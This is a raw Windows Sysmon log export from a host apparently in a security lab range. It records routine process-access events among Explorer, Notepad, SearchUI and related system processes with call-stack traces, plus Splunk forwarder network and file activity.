12:05:55.301{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:55.301{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:55.301{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:55.285{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:55.285{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:55.285{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:55.285{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000009770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:55.446{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53646-false10.0.1.12-8000- 23542300x80000000000000009769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:56.551{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CCBE8779EE761AB4E7EF5DB015D6375,SHA256=99C7FAB33F023F52F6FA073000A5C823F554A624966B45A4B6229628075496F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.972{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.972{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.972{266CAFBE-64C5-6064-A500-00000000AE01}43566732C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.972{266CAFBE-64C5-6064-A500-00000000AE01}43566732C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.956{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.956{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.941{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.941{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000009794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.941{266CAFBE-64C5-6064-A500-00000000AE01}43563772C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000009793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.941{266CAFBE-64C5-6064-A500-00000000AE01}43563772C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.941{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersi
veshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000009791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.941{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000009790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.925{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.925{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.925{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.909{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
